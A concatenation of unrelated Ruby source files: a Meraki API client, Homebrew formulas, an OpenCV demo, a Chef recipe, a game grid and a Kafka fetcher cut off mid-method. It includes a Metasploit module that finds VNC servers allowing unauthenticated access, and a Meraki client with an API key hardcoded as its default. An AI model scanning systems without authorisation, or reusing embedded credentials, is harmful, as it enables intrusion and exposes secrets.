def traffic_shaping
TrafficShapingController.instance
end
# Singleton access to wireless_health controller.
# @return [WirelessHealthController] Returns the controller instance.
def wireless_health
WirelessHealthController.instance
end
# Singleton access to alert_settings controller.
# @return [AlertSettingsController] Returns the controller instance.
def alert_settings
AlertSettingsController.instance
end
# Singleton access to admins controller.
# @return [AdminsController] Returns the controller instance.
def admins
AdminsController.instance
end
# Singleton access to action_batches controller.
# @return [ActionBatchesController] Returns the controller instance.
def action_batches
ActionBatchesController.instance
end
# Singleton access to switch_ports controller.
# @return [SwitchPortsController] Returns the controller instance.
def switch_ports
SwitchPortsController.instance
end
# Singleton access to ssids controller.
# @return [SsidsController] Returns the controller instance.
def ssids
SsidsController.instance
end
# Singleton access to splash_settings controller.
# @return [SplashSettingsController] Returns the controller instance.
def splash_settings
SplashSettingsController.instance
end
# Singleton access to splash_login_attempts controller.
# @return [SplashLoginAttemptsController] Returns the controller instance.
def splash_login_attempts
SplashLoginAttemptsController.instance
end
# Singleton access to sm controller.
# @return [SMController] Returns the controller instance.
def sm
SMController.instance
end
# Singleton access to named_tag_scope controller.
# @return [NamedTagScopeController] Returns the controller instance.
def named_tag_scope
NamedTagScopeController.instance
end
# Singleton access to saml_roles controller.
# @return [SAMLRolesController] Returns the controller instance.
def saml_roles
SAMLRolesController.instance
end
# Singleton access to pii controller.
# @return [PIIController] Returns the controller instance.
def pii
PIIController.instance
end
# Singleton access to open_api_spec controller.
# @return [OpenAPISpecController] Returns the controller instance.
def open_api_spec
OpenAPISpecController.instance
end
# Singleton access to management_interface_settings controller.
# @return [ManagementInterfaceSettingsController] Returns the controller instance.
def management_interface_settings
ManagementInterfaceSettingsController.instance
end
# Singleton access to mr_l3_firewall controller.
# @return [MRL3FirewallController] Returns the controller instance.
def mr_l3_firewall
MRL3FirewallController.instance
end
# Singleton access to mx_l7_firewall controller.
# @return [MXL7FirewallController] Returns the controller instance.
def mx_l7_firewall
MXL7FirewallController.instance
end
# Singleton access to group_policies controller.
# @return [GroupPoliciesController] Returns the controller instance.
def group_policies
GroupPoliciesController.instance
end
# Singleton access to networks controller.
# @return [NetworksController] Returns the controller instance.
def networks
NetworksController.instance
end
# Singleton access to mv_sense controller.
# @return [MVSenseController] Returns the controller instance.
def mv_sense
MVSenseController.instance
end
# Singleton access to vlans controller.
# @return [VlansController] Returns the controller instance.
def vlans
VlansController.instance
end
# Singleton access to uplink_settings controller.
# @return [UplinkSettingsController] Returns the controller instance.
def uplink_settings
UplinkSettingsController.instance
end
# Singleton access to static_routes controller.
# @return [StaticRoutesController] Returns the controller instance.
def static_routes
StaticRoutesController.instance
end
# Singleton access to mx_port_forwarding_rules controller.
# @return [MXPortForwardingRulesController] Returns the controller instance.
def mx_port_forwarding_rules
MXPortForwardingRulesController.instance
end
# Singleton access to mx_1_1_nat_rules controller.
# @return [MX11NATRulesController] Returns the controller instance.
def mx_1_1_nat_rules
MX11NATRulesController.instance
end
# Singleton access to content_filtering_rules controller.
# @return [ContentFilteringRulesController] Returns the controller instance.
def content_filtering_rules
ContentFilteringRulesController.instance
end
# Singleton access to content_filtering_categories controller.
# @return [ContentFilteringCategoriesController] Returns the controller instance.
def content_filtering_categories
ContentFilteringCategoriesController.instance
end
# Singleton access to syslog_servers controller.
# @return [SyslogServersController] Returns the controller instance.
def syslog_servers
SyslogServersController.instance
end
# Singleton access to switch_stacks controller.
# @return [SwitchStacksController] Returns the controller instance.
def switch_stacks
SwitchStacksController.instance
end
# Singleton access to switch_profiles controller.
# @return [SwitchProfilesController] Returns the controller instance.
def switch_profiles
SwitchProfilesController.instance
end
# Singleton access to switch_settings controller.
# @return [SwitchSettingsController] Returns the controller instance.
def switch_settings
SwitchSettingsController.instance
end
# Singleton access to snmp_settings controller.
# @return [SNMPSettingsController] Returns the controller instance.
def snmp_settings
SNMPSettingsController.instance
end
# Singleton access to malware_settings controller.
# @return [MalwareSettingsController] Returns the controller instance.
def malware_settings
MalwareSettingsController.instance
end
# Singleton access to intrusion_settings controller.
# @return [IntrusionSettingsController] Returns the controller instance.
def intrusion_settings
IntrusionSettingsController.instance
end
# Singleton access to radio_settings controller.
# @return [RadioSettingsController] Returns the controller instance.
def radio_settings
RadioSettingsController.instance
end
# Singleton access to clients controller.
# @return [ClientsController] Returns the controller instance.
def clients
ClientsController.instance
end
# Singleton access to api_usage controller.
# @return [APIUsageController] Returns the controller instance.
def api_usage
APIUsageController.instance
end
# Singleton access to net_flow_settings controller.
# @return [NetFlowSettingsController] Returns the controller instance.
def net_flow_settings
NetFlowSettingsController.instance
end
# Singleton access to meraki_auth_users controller.
# @return [MerakiAuthUsersController] Returns the controller instance.
def meraki_auth_users
MerakiAuthUsersController.instance
end
# Singleton access to http_servers controller.
# @return [HTTPServersController] Returns the controller instance.
def http_servers
HTTPServersController.instance
end
# Singleton access to mx_vpn_firewall controller.
# @return [MXVPNFirewallController] Returns the controller instance.
def mx_vpn_firewall
MXVPNFirewallController.instance
end
# Singleton access to mx_l7_application_categories controller.
# @return [MXL7ApplicationCategoriesController] Returns the controller instance.
def mx_l7_application_categories
MXL7ApplicationCategoriesController.instance
end
# Singleton access to mx_l3_firewall controller.
# @return [MXL3FirewallController] Returns the controller instance.
def mx_l3_firewall
MXL3FirewallController.instance
end
# Singleton access to mx_cellular_firewall controller.
# @return [MXCellularFirewallController] Returns the controller instance.
def mx_cellular_firewall
MXCellularFirewallController.instance
end
# Singleton access to devices controller.
# @return [DevicesController] Returns the controller instance.
def devices
DevicesController.instance
end
# Singleton access to config_templates controller.
# @return [ConfigTemplatesController] Returns the controller instance.
def config_templates
ConfigTemplatesController.instance
end
# Singleton access to cameras controller.
# @return [CamerasController] Returns the controller instance.
def cameras
CamerasController.instance
end
# Singleton access to bluetooth_clients controller.
# @return [BluetoothClientsController] Returns the controller instance.
def bluetooth_clients
BluetoothClientsController.instance
end
# Singleton access to security_events controller.
# @return [SecurityEventsController] Returns the controller instance.
def security_events
SecurityEventsController.instance
end
# Singleton access to webhook_logs controller.
# @return [WebhookLogsController] Returns the controller instance.
def webhook_logs
WebhookLogsController.instance
end
# Returns the configuration class for easy access.
# @return [Configuration] Returns the actual configuration class.
def config
Configuration
end
# Initializer with authentication and configuration parameters.
def initialize(x_cisco_meraki_api_key: '15da0c6ffff295f16267f88f98694cf29a86ed87')
Configuration.x_cisco_meraki_api_key = x_cisco_meraki_api_key if
x_cisco_meraki_api_key
end
end
end
| 33.526471 | 87 | 0.734012 |
bfd4de6618eefc5bb8d3a86c6eab81c4c8629c58 | 2,888 | class Mandoc < Formula
desc "The mandoc UNIX manpage compiler toolset"
homepage "https://mandoc.bsd.lv/"
url "https://mandoc.bsd.lv/snapshots/mandoc-1.14.3.tar.gz"
sha256 "0b0c8f67958c1569ead4b690680c337984b879dfd2ad4648d96924332fd99528"
head "[email protected]:/cvs", :using => :cvs
bottle do
sha256 "c16d34b3c6c0e22ede164139f6fdb0268a440e39ca94ce791d5f580b4c2c01f1" => :high_sierra
sha256 "59709d56bff5dedfe3f544b4da3d6791f32dbf4e4299a242719b39a21dc0c050" => :sierra
sha256 "2e23fd7255dc440233289f138edc9dada06eab91ff3570329fa5ebce425f5714" => :el_capitan
sha256 "dd4131a36901d8650f896c90bd6e9cc08bfe6d146db5c7461e63e0e6e2b3d49a" => :yosemite
end
option "without-cgi", "Don't build man.cgi (and extra CSS files)."
def install
localconfig = [
# Sane prefixes.
"PREFIX=#{prefix}",
"INCLUDEDIR=#{include}",
"LIBDIR=#{lib}",
"MANDIR=#{man}",
"WWWPREFIX=#{prefix}/var/www",
"EXAMPLEDIR=#{share}/examples",
# Executable names, where utilities would be replaced/duplicated.
# The mandoc versions of the utilities are definitely *not* ready
# for prime-time on Darwin, though some changes in HEAD are promising.
# The "bsd" prefix (like bsdtar, bsdmake) is more informative than "m".
"BINM_MAN=bsdman",
"BINM_APROPOS=bsdapropos",
"BINM_WHATIS=bsdwhatis",
"BINM_MAKEWHATIS=bsdmakewhatis", # default is "makewhatis".
# These are names for *section 7* pages only. Several other pages are
# prefixed "mandoc_", similar to the "groff_" pages.
"MANM_MAN=man",
"MANM_MDOC=mdoc",
"MANM_ROFF=mandoc_roff", # This is the only one that conflicts (groff).
"MANM_EQN=eqn",
"MANM_TBL=tbl",
"OSNAME='Mac OS X #{MacOS.version}'", # Bottom corner signature line.
# Not quite sure what to do here. The default ("/usr/share", etc.) needs
# sudoer privileges, or will error. So just brew's manpages for now?
"MANPATH_DEFAULT=#{HOMEBREW_PREFIX}/share/man",
"HAVE_MANPATH=0", # Our `manpath` is a symlink to system `man`.
"STATIC=", # No static linking on Darwin.
"HOMEBREWDIR=#{HOMEBREW_CELLAR}" # ? See configure.local.example, NEWS.
]
localconfig << "BUILD_CGI=1" if build.with? "cgi"
File.rename("cgi.h.example", "cgi.h") # For man.cgi, harmless in any case.
(buildpath/"configure.local").write localconfig.join("\n")
system "./configure"
# I've tried twice to send a bug report on this to [email protected].
# In theory, it should show up with:
# search.gmane.org/?query=jobserver&group=gmane.comp.tools.mdocml.devel
ENV.deparallelize do
system "make"
system "make", "install"
end
end
test do
system "#{bin}/mandoc", "-Thtml",
"-Ostyle=#{share}/examples/example.style.css", "#{man1}/mandoc.1"
end
end
| 37.506494 | 93 | 0.676939 |
288fd0a8d9d18991330495a6c83361576fca8a34 | 5,194 | #!/usr/bin/env ruby
# -*- mode: ruby; coding: utf-8 -*-
# A Demo Ruby/OpenCV Implementation of SURF
# See https://code.ros.org/trac/opencv/browser/tags/2.3.1/opencv/samples/c/find_obj.cpp
require 'opencv'
require 'benchmark'
include OpenCV
# Sum of squared differences between two SURF descriptor vectors, accumulated
# four components at a time. Bails out early — returning the partial sum —
# as soon as the running cost exceeds +best+: a nearest-neighbour caller only
# needs to know this candidate cannot beat the current best.
#
# Raises ArgumentError when +length+ is not a multiple of 4.
def compare_surf_descriptors(d1, d2, best, length)
  raise ArgumentError unless (length % 4).zero?
  total_cost = 0
  (0...length).step(4) do |i|
    group_cost = (0..3).sum do |k|
      diff = d1[i + k] - d2[i + k]
      diff * diff
    end
    total_cost += group_cost
    break if total_cost > best
  end
  total_cost
end
# Brute-force nearest-neighbour search for a SURF descriptor +vec+ over
# +model_descriptors+, applying Lowe's ratio test: the best match is accepted
# only when its distance is clearly smaller (< 0.6x) than the second-best.
# Candidates whose keypoint laplacian sign differs are skipped outright —
# SURF descriptors with opposite laplacian signs cannot match.
#
# Returns the index of the accepted neighbour, or nil when no candidate
# passes the ratio test.
def naive_nearest_neighbor(vec, laplacian, model_keypoints, model_descriptors)
  length = model_descriptors[0].size
  neighbor = nil
  dist1 = 1e6 # best (smallest) distance seen so far
  dist2 = 1e6 # second-best distance, used both as early-exit bound and ratio denominator
  model_descriptors.size.times { |i|
    kp = model_keypoints[i]
    mvec = model_descriptors[i]
    next if laplacian != kp.laplacian
    # dist2 doubles as the "best" cutoff: any candidate worse than the current
    # second-best can be abandoned mid-sum inside compare_surf_descriptors.
    d = compare_surf_descriptors(vec, mvec, dist2, length)
    if d < dist1
      # New best: the old best becomes the second-best.
      dist2 = dist1
      dist1 = d
      neighbor = i
    elsif d < dist2
      dist2 = d
    end
  }
  # Lowe ratio test: require the best match to be unambiguous.
  return (dist1 < 0.6 * dist2) ? neighbor : nil
end
# Match every object descriptor against the scene ("image") descriptors.
# Returns a flat array of interleaved index pairs
# [obj_i, img_i, obj_j, img_j, ...], one pair per object keypoint whose
# nearest neighbour passed the ratio test.
def find_pairs(object_keypoints, object_descriptors,
               image_keypoints, image_descriptors)
  pairs = []
  object_descriptors.each_with_index do |descriptor, i|
    keypoint = object_keypoints[i]
    match = naive_nearest_neighbor(descriptor, keypoint.laplacian,
                                   image_keypoints, image_descriptors)
    pairs.push(i, match) unless match.nil?
  end
  pairs
end
# Estimates a homography from matched keypoint pairs and projects the
# object's corners into the scene image.
#
# object_keypoints/object_descriptors - SURF output for the object image.
# image_keypoints/image_descriptors   - SURF output for the scene image.
# src_corners                         - the four corners of the object image.
#
# Returns an array of four CvPoint corners in scene coordinates, or nil
# when fewer than four matches are found.
def locate_planar_object(object_keypoints, object_descriptors,
                         image_keypoints, image_descriptors, src_corners)
  ptpairs = find_pairs(object_keypoints, object_descriptors, image_keypoints, image_descriptors)
  n = ptpairs.size / 2
  return nil if n < 4

  pt1 = []
  pt2 = []
  n.times { |i|
    pt1 << object_keypoints[ptpairs[i * 2]].pt
    pt2 << image_keypoints[ptpairs[i * 2 + 1]].pt
  }

  _pt1 = CvMat.new(1, n, CV_32F, 2)
  _pt2 = CvMat.new(1, n, CV_32F, 2)
  _pt1.set_data(pt1)
  _pt2.set_data(pt2)
  h = CvMat.find_homography(_pt1, _pt2, :ransac, 5)

  dst_corners = []
  4.times { |i|
    x = src_corners[i].x
    y = src_corners[i].y
    z = 1.0 / (h[6][0] * x + h[7][0] * y + h[8][0])
    # BUG FIX: the previous code overwrote `x` with the projected value and
    # then used that new `x` while projecting `y`. Both projected
    # coordinates must be computed from the ORIGINAL (x, y), as in the
    # OpenCV find_obj.cpp sample this script ports.
    px = (h[0][0] * x + h[1][0] * y + h[2][0]) * z
    py = (h[3][0] * x + h[4][0] * y + h[5][0]) * z
    dst_corners << CvPoint.new(px.to_i, py.to_i)
  }
  dst_corners
end
##### Main #####
# Demo driver: finds a planar object (box.png) inside a cluttered scene
# (box_in_scene.png) by brute-force matching of SURF descriptors.
puts 'This program demonstrated the use of the SURF Detector and Descriptor using'
puts 'brute force matching on planar objects.'
puts 'Usage:'
puts "ruby #{__FILE__} <object_filename> <scene_filename>, default is box.png and box_in_scene.png"
puts
# Both filenames must be supplied together; otherwise fall back to samples.
object_filename = (ARGV.size == 2) ? ARGV[0] : 'images/box.png'
scene_filename = (ARGV.size == 2) ? ARGV[1] : 'images/box_in_scene.png'
object, image = nil, nil
begin
  object = IplImage.load(object_filename, CV_LOAD_IMAGE_GRAYSCALE)
  image = IplImage.load(scene_filename, CV_LOAD_IMAGE_GRAYSCALE)
rescue
  puts "Can not load #{object_filename} and/or #{scene_filename}"
  puts "Usage: ruby #{__FILE__} [<object_filename> <scene_filename>]"
  exit
end
object_color = object.GRAY2BGR
# SURF hessian threshold: higher values yield fewer, more robust keypoints.
param = CvSURFParams.new(1500)
object_keypoints, object_descriptors = nil, nil
image_keypoints, image_descriptors = nil, nil
tms = Benchmark.measure {
  object_keypoints, object_descriptors = object.extract_surf(param)
  puts "Object Descriptors: #{object_descriptors.size}"
  image_keypoints, image_descriptors = image.extract_surf(param)
  puts "Image Descriptors: #{image_descriptors.size}"
}
puts "Extraction time = #{tms.real * 1000} ms"
# Stack the object image above the scene image in one canvas so that match
# lines can be drawn between the two halves.
correspond = IplImage.new(image.width, object.height + image.height, CV_8U, 1);
correspond.set_roi(CvRect.new(0, 0, object.width, object.height))
object.copy(correspond)
correspond.set_roi(CvRect.new(0, object.height, image.width, image.height))
image.copy(correspond)
correspond.reset_roi
# Corners of the object image; locate_planar_object maps them into scene
# coordinates via the estimated homography.
src_corners = [CvPoint.new(0, 0), CvPoint.new(object.width, 0),
               CvPoint.new(object.width, object.height), CvPoint.new(0, object.height)]
dst_corners = locate_planar_object(object_keypoints, object_descriptors,
                                   image_keypoints, image_descriptors, src_corners)
correspond = correspond.GRAY2BGR
# Outline the located object in the scene half (offset by object.height).
if dst_corners
  4.times { |i|
    r1 = dst_corners[i % 4]
    r2 = dst_corners[(i + 1) % 4]
    correspond.line!(CvPoint.new(r1.x, r1.y + object.height), CvPoint.new(r2.x, r2.y + object.height),
                     color: CvColor::Red, thickness: 2, line_type: :aa)
  }
end
# Draw a line for every matched descriptor pair (object -> scene keypoint).
ptpairs = find_pairs(object_keypoints, object_descriptors, image_keypoints, image_descriptors)
0.step(ptpairs.size - 1, 2) { |i|
  r1 = object_keypoints[ptpairs[i]]
  r2 = image_keypoints[ptpairs[i + 1]]
  correspond.line!(r1.pt, CvPoint.new(r2.pt.x, r2.pt.y + object.height),
                   color: CvColor::Red, line_type: :aa)
}
# Mark each object keypoint with a circle scaled to its SURF size.
object_keypoints.each { |r|
  radius = (r.size * 1.2 / 9.0 * 2).to_i
  object_color.circle!(r.pt, radius, color: CvColor::Red, line_type: :aa)
}
GUI::Window.new('Object Correspond').show correspond
GUI::Window.new('Object').show object_color
GUI::wait_key
| 30.552941 | 107 | 0.67424 |
030e71e18d09494c92c7874cb2dcb980092cf667 | 1,122 | =begin
This file is a cotribution to Viewpoint; the Ruby library for Microsoft Exchange Web Services.
Copyright © 2013 Mark McCahill <[email protected]>
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
=end
module Viewpoint::EWS::CalendarAccessors
  include Viewpoint::EWS

  # Accessors for fields of an EWS CalendarEvent hash as parsed from a
  # GetUserAvailability response. The previous implementation reached into
  # the :elems array by fixed position ([0] start, [1] end, [2] busy type)
  # and raised NoMethodError on any missing intermediate hash; elements are
  # now located by key, returning nil when absent.

  def event_busy_type( the_event )
    calendar_event_elem_text(the_event, :busy_type)
  end

  def event_start_time( the_event )
    calendar_event_elem_text(the_event, :start_time)
  end

  def event_end_time( the_event )
    calendar_event_elem_text(the_event, :end_time)
  end

  private

  # Finds the element hash carrying +key+ inside the event's :elems array
  # and returns its :text payload, or nil when the structure is missing.
  def calendar_event_elem_text(the_event, key)
    elems = the_event.dig(:calendar_event, :elems) || []
    elem = elems.find { |e| e.is_a?(Hash) && e.key?(key) }
    elem && elem.dig(key, :text)
  end
end # Viewpoint::EWS::CalendarAccessors
| 32.057143 | 94 | 0.755793 |
b9d604f5fd072dcfbb238d1afe30fa07ea3e3783 | 66 | # frozen_string_literal: true
# Jbuilder partial: emits the given user's id, username and name as JSON.
json.(user, :id, :username, :name)
| 16.5 | 34 | 0.712121 |
d57d9fc3eb6efb691b0c541fed166c20325a2b20 | 1,210 | class B3sum < Formula
desc "The BLAKE3 cryptographic hash function"
homepage "https://github.com/BLAKE3-team/BLAKE3"
url "https://github.com/BLAKE3-team/BLAKE3/archive/0.3.1.tar.gz"
sha256 "200587a49098957b5c119936ebee248cae4fb437827e444c7708e92ddf55836c"
bottle do
cellar :any_skip_relocation
sha256 "242cb591b1c1508de78f07837eacfc3cfc998380475a96e2e55e0038ea0fa169" => :catalina
sha256 "68f37fc80b6eaa9621f944548f76c43942d4bde6b54489e1b0c7577261d9b3fc" => :mojave
sha256 "1bd0a9cddba682167b84e8ea52eaf1a5f3303ca477fd0bbcae75ade764a1acba" => :high_sierra
end
depends_on "llvm" => :build if DevelopmentTools.clang_build_version <= 1000
depends_on "rust" => :build
def install
if DevelopmentTools.clang_build_version <= 1000
ENV["HOMEBREW_CC"] = "llvm_clang"
ENV.remove "HOMEBREW_LIBRARY_PATHS", Formula["llvm"].opt_lib
end
system "cargo", "install", "--locked", "--root", prefix, "--path", "./b3sum/"
end
test do
(testpath/"test.txt").write <<~EOS
content
EOS
output = shell_output("#{bin}/b3sum test.txt")
assert_equal "df0c40684c6bda3958244ee330300fdcbc5a37fb7ae06fe886b786bc474be87e test.txt", output.strip
end
end
| 35.588235 | 107 | 0.74876 |
1a32b770322535cc460ca8e5263322db9a34fe8f | 1,383 | #
# Cookbook Name:: mysql
# Recipe:: client
#
# Copyright 2008-2011, Opscode, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Make the Opscode MySQL helper predicates (debian_before_squeeze?, etc.)
# available inside package resources.
::Chef::Resource::Package.send(:include, Opscode::Mysql::Helpers)

# Select the MySQL client + development packages appropriate for this
# platform family.
mysql_packages = case node['platform']
when "centos", "redhat", "suse", "fedora", "scientific", "amazon"
  %w{mysql mysql-devel}
when "ubuntu","debian"
  # Releases before Debian squeeze / Ubuntu lucid shipped the versioned
  # libmysqlclient15 development package.
  if debian_before_squeeze? || ubuntu_before_lucid?
    %w{mysql-client libmysqlclient15-dev}
  else
    %w{mysql-client libmysqlclient-dev}
  end
when "freebsd"
  %w{mysql55-client}
else
  %w{mysql-client libmysqlclient-dev}
end

mysql_packages.each do |mysql_pack|
  package mysql_pack do
    action :install
  end
end

# Install the Ruby MySQL bindings from the distro package where one exists,
# falling back to the mysql gem elsewhere.
if platform?(%w{ redhat centos fedora suse scientific amazon })
  package 'ruby-mysql'
elsif platform?(%w{ debian ubuntu })
  package "libmysql-ruby"
else
  gem_package "mysql" do
    action :install
  end
end
| 26.596154 | 74 | 0.733189 |
62ae92efc396dea24f08919234f9e53d05d37ea4 | 685 | require 'redcarpet'
module ExtraExtra
class SemanticHtmlRenderer < Redcarpet::Render::HTML
def initialize(opts={})
@header_level_offset = opts.delete(:header_level_offset) || 1
@header_class_prefix = opts.delete(:header_class_prefix) || "h"
@header_class_prefix_offset = opts.delete(:header_class_prefix_offset) || (@header_level_offset + 1)
super(opts)
end
def header(text, header_level,anchor=nil)
anchor ||= text.parameterize
"<a name='#{anchor}'></a><h#{header_level+@header_level_offset} class='#{@header_class_prefix}#{header_level+@header_class_prefix_offset}'>#{text}</h#{header_level+@header_level_offset}>"
end
end
end
| 42.8125 | 193 | 0.718248 |
33b260cd4ded90eb72cab72b4ce56d9768d97a7f | 2,494 | ##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'rex/proto/rfb'
class Metasploit3 < Msf::Auxiliary

  include Msf::Exploit::Remote::Tcp
  include Msf::Auxiliary::Report
  include Msf::Auxiliary::Scanner

  def initialize
    super(
      'Name'        => 'VNC Authentication None Detection',
      'Description' => 'Detect VNC servers that support the "None" authentication method.',
      'References'  =>
        [
          ['URL', 'http://en.wikipedia.org/wiki/RFB'],
          ['URL', 'http://en.wikipedia.org/wiki/Vnc'],
        ],
      'Author'      =>
        [
          'Matteo Cantoni <goony[at]nothink.org>',
          'jduck'
        ],
      'License'     => MSF_LICENSE
    )

    register_options(
      [
        Opt::RPORT(5900)
      ], self.class)
  end

  # Scans a single host: performs the RFB handshake, reports the protocol
  # version and advertised security types as a service, and records a vuln
  # when the "None" authentication type is offered (i.e. free access).
  def run_host(target_host)
    connect

    begin
      vnc = Rex::Proto::RFB::Client.new(sock)

      raise "Handshake failed: #{vnc.error}" unless vnc.handshake

      ver = "#{vnc.majver}.#{vnc.minver}"
      print_status("#{target_host}:#{rport}, VNC server protocol version : #{ver}")

      svc = report_service(
        :host => rhost,
        :port => rport,
        :proto => 'tcp',
        :name => 'vnc',
        :info => "VNC protocol version #{ver}"
      )

      raise "Auth negotiation failed: #{vnc.error}" unless vnc.negotiate_authentication

      # Show the allowed security types. The block parameter is named
      # auth_type to avoid shadowing (the original code reused `type`,
      # clobbering the negotiation result above inside the block).
      sec_type = vnc.auth_types.map do |auth_type|
        Rex::Proto::RFB::AuthType.to_s(auth_type)
      end

      print_status("#{target_host}:#{rport}, VNC server security types supported : #{sec_type.join(",")}")

      if (vnc.auth_types.include? Rex::Proto::RFB::AuthType::None)
        print_good("#{target_host}:#{rport}, VNC server security types includes None, free access!")
        report_vuln(
          {
            :host         => rhost,
            :service      => svc,
            :name         => self.name,
            :info         => "Module #{self.fullname} identified the VNC 'none' security type: #{sec_type.join(", ")}",
            :refs         => self.references,
            :exploited_at => Time.now.utc
          })
      end
    rescue RuntimeError
      print_error("#{target_host}:#{rport}, #{$!}")
      # Bare raise re-raises the in-flight exception for the scanner mixin.
      raise
    ensure
      disconnect
    end
  end
end
| 27.108696 | 119 | 0.558941 |
ac74ca82ea8c5e62e7564bb29c660d4c5c025310 | 1,006 | # This file is auto-generated from the current state of the database. Instead
# of editing this file, please use the migrations feature of Active Record to
# incrementally modify your database, and then regenerate this schema definition.
#
# This file is the source Rails uses to define your schema when running `bin/rails
# db:schema:load`. When creating a new database, `bin/rails db:schema:load` tends to
# be faster and is potentially less error prone than running all of your
# migrations from scratch. Old migrations may fail to apply correctly if those
# migrations use external dependencies or application code.
#
# It's strongly recommended that you check this file into your version control system.
ActiveRecord::Schema.define(version: 20_210_312_124_849) do
  # Users table with basic credential fields.
  create_table 'users', force: :cascade do |t|
    t.string 'username'
    t.string 'email'
    # NOTE(review): a bare `password` string column suggests plaintext
    # storage; typically this would be `password_digest` with
    # has_secure_password. Address via a migration — this file is
    # auto-generated and must not be edited by hand.
    t.string 'password'
    t.datetime 'created_at', precision: 6, null: false
    t.datetime 'updated_at', precision: 6, null: false
  end
end
| 45.727273 | 86 | 0.764414 |
class Grid
  # Column-major board for a Connect-Four style game. Tokens are pushed
  # into a column and stack upward from row 0 (the bottom row).
  attr_reader :columns, :width, :height

  def initialize(width, height)
    @width = width
    @height = height
    # One inner array per column; entries stay nil until a token lands.
    @columns = Array.new(width) { Array.new(height) }
  end

  # Drops +token+ into +column+.
  #
  # Raises ArgumentError for an out-of-range column. BUG FIX: negative
  # columns were previously accepted and wrapped around via Ruby's negative
  # Array indexing, landing the token in the wrong column. A push into a
  # full column is silently ignored, matching the original behavior.
  def push(token, column)
    raise ArgumentError if column < 0 || column >= @width
    return if column_full?(column)

    @columns[column][next_row_index(column)] = token
  end

  # The grid consists of columns starting from bottom left:
  # 0,2 1,2 2,2
  # 0,1 1,1 2,1
  # 0,0 1,0 2,0
  def to_a
    @columns
  end

  # Renders the board as text, one row per line; filled cells are "◉ " and
  # empty cells two spaces. When the Paint gem is loaded, each token is
  # colored deterministically from a digest of its value and the
  # +highlighted_character+ token is emphasised.
  # NOTE(review): the transpose prints row 0 (the bottom row) first, and the
  # Paint branch relies on Digest being required elsewhere — confirm both
  # against the callers.
  def to_colorful_string(highlighted_character = "")
    @columns.transpose.map { |row|
      row.map { |token|
        token_display = token ? "◉ " : "  "
        if token && defined? Paint
          token_display = Paint[token_display, Digest::SHA2.hexdigest(token)[0..5]]
          token_display = Paint[token_display, :bright, :underline] if token == highlighted_character
        end
        token_display
      }.join("")
    }.join("\n")
  end

  private

  # A column is full when its top-most slot is occupied.
  def column_full?(column)
    @columns[column][-1] != nil
  end

  # Index of the lowest empty slot in +column+.
  def next_row_index(column)
    @columns[column].index(&:nil?)
  end
end
| 21.96 | 101 | 0.623862 |
6122841b7690facab8485f05963ab4cbd2e96055 | 800 | class Primesieve < Formula
desc "Fast C/C++ prime number generator"
homepage "http://primesieve.org/"
url "https://github.com/kimwalisch/primesieve/archive/v6.2.tar.gz"
sha256 "c4d1c358ab95b370dcac317fe1820e41d60460b22e450359ebc4bdd507bb2547"
bottle do
cellar :any
sha256 "f03b9925f3e732b47989196b1a09ce1cefcd45c3181516630bdadd6de1549084" => :high_sierra
sha256 "6497a4d9e833a240271d2934c9726a36e971d08b1d5a0097901eb2e9a2d8bb1f" => :sierra
sha256 "b4d46e227db20da387247c244bf9a13dfe1c23b19b922cbcf20a4b47994eb059" => :el_capitan
end
depends_on "cmake" => :build
def install
mkdir "build" do
system "cmake", "..", *std_cmake_args
system "make", "install"
end
end
test do
system "#{bin}/primesieve", "100", "--count", "--print"
end
end
| 29.62963 | 93 | 0.7375 |
f78b4669e14c8d67a7863457ba26ee87caea0f18 | 4,892 | # frozen_string_literal: true
require "kafka/fetch_operation"
module Kafka
  # Fetcher owns a background thread that prefetches message batches from
  # the cluster into an in-memory queue, which the consumer drains via
  # #poll. All mutations (subscribe/seek/configure/start/stop/reset) are
  # serialized through a command queue and executed on the fetcher thread
  # itself, so the internal state needs no locking.
  class Fetcher
    # Queue of [:batches, batches] / [:exception, error] tuples handed to
    # the consumer.
    attr_reader :queue

    def initialize(cluster:, logger:, instrumenter:, max_queue_size:, group:)
      @cluster = cluster
      @logger = logger
      @instrumenter = instrumenter
      @max_queue_size = max_queue_size
      @group = group

      @queue = Queue.new
      @commands = Queue.new
      # topic => { partition => next offset to fetch }
      @next_offsets = Hash.new { |h, k| h[k] = {} }

      # Long poll until at least this many bytes can be fetched.
      @min_bytes = 1

      # Long poll at most this number of seconds.
      @max_wait_time = 1

      # The maximum number of bytes to fetch for any given fetch request.
      @max_bytes = 10485760

      # The maximum number of bytes to fetch per partition, by topic.
      @max_bytes_per_partition = {}

      # NOTE: `loop` here is the private instance method defined below, not
      # Kernel#loop — `loop while true` invokes one fetch/command iteration
      # per pass, forever.
      @thread = Thread.new do
        loop while true
      end

      @thread.abort_on_exception = true
    end

    # The public methods below only enqueue commands; the fetcher thread
    # performs the actual work in the matching handle_* methods.
    def subscribe(topic, max_bytes_per_partition:)
      @commands << [:subscribe, [topic, max_bytes_per_partition]]
    end

    def seek(topic, partition, offset)
      @commands << [:seek, [topic, partition, offset]]
    end

    def configure(min_bytes:, max_bytes:, max_wait_time:)
      @commands << [:configure, [min_bytes, max_bytes, max_wait_time]]
    end

    def start
      @commands << [:start, []]
    end

    def handle_start
      raise "already started" if @running
      @running = true
    end

    def stop
      @commands << [:stop, []]
    end

    def reset
      @commands << [:reset, []]
    end

    # True when at least one fetched batch (or exception) is buffered.
    def data?
      !@queue.empty?
    end

    # Blocks until the fetcher thread has produced something.
    def poll
      @queue.deq
    end

    private

    # One iteration of the fetcher thread: handle a pending command first;
    # otherwise fetch more data, backing off when not started or when the
    # queue is already at capacity.
    def loop
      @instrumenter.instrument("loop.fetcher", {
        queue_size: @queue.size,
      })

      if !@commands.empty?
